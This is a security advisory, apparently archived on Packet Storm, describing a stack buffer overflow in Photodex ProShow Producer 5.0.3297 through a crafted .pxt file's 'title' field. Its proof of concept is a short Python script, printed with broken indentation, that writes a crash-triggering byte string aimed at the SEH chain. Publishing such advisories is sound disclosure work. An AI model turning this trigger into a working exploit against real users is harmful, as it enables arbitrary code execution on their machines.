exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Photodex ProShow Producer 5.0.3297 Buffer Overflow

Photodex ProShow Producer 5.0.3297 Buffer Overflow
Posted Feb 17, 2013
Authored by Julien Ahrens | Site security.inshell.net

Photodex ProShow Producer version 5.0.3297 suffers from a stack-based buffer overflow vulnerability. When opening a crafted transition file (.pxt) the application loads the "title" value from the pxt file. The application does not properly validate the length of the string loaded from the "title" value from the pxt file before using it in the further application context, which leads to a buffer overflow condition with possible code execution via overwritten SEH chains on Windows XP/7 32bit. Proof of concept code included.

tags | exploit, overflow, code execution, proof of concept
systems | windows
SHA-256 | ea2d7dca9a83d313a225c8b9a5f034f06ab679db12c229e96637363431e9c049

Photodex ProShow Producer 5.0.3297 Buffer Overflow

Change Mirror Download
Inshell Security Advisory
http://www.inshell.net


1. ADVISORY INFORMATION
-----------------------
Product: Photodex ProShow Producer
Vendor URL: www.photodex.com
Type: Stack-based Buffer Overflow [CWE-121]
Date found: 2013-02-16
Date published: 2013-02-16
CVSSv2 Score: 6,8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CVE: -


2. CREDITS
----------
This vulnerability was discovered and researched by Julien Ahrens from
Inshell Security.


3. VERSIONS AFFECTED
--------------------
Photodex ProShow Producer v5.0.3297, older versions may be affected too.


4. VULNERABILITY DESCRIPTION
----------------------------
A buffer overflow vulnerability has been identified in Photodex ProShow
Producer v5.0.3297.

When opening a crafted transition file (.pxt) the application loads the
"title" value from the pxt file.

The application does not properly validate the length of the string
loaded from the "title" value from the pxt file before using it in the
further application context, which leads to a buffer overflow condition
with possible code execution via overwritten SEH chains on Windows XP/7
32bit.

An attacker needs to force the victim to open a crafted .pxt file in
order to exploit the vulnerability. Successful exploits can allow
attackers to execute arbitrary code with the privileges of the user
running the application. Failed exploits will result in
denial-of-service conditions.


5. PROOF-OF-CONCEPT (Code / Exploit)
------------------------------------
The following generated string has to be inserted into a .pxt file to
trigger the vulnerability.

#!/usr/bin/python
file="poc.txt"

junk1="\x41" * 24
eip="\x42" * 4
junk2="\xCC" * 50000

poc=junk1 + eip + junk2

try:
print ("[*] Creating exploit file...\n");
writeFile = open (file, "w")
writeFile.write( poc )
writeFile.close()
print ("[*] File successfully created!");
except:
print ("[!] Error while creating file!");


For further Screenshots and/or PoCs visit:
http://security.inshell.net/advisory/47


6. SOLUTION
-----------
None


7. REPORT TIMELINE
------------------
2013-02-16: Discovery of the vulnerability
2013-02-16: Full Disclosure because the vendor ignored previous
reports.


8. REFERENCES
-------------
http://security.inshell.net/advisory/47
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close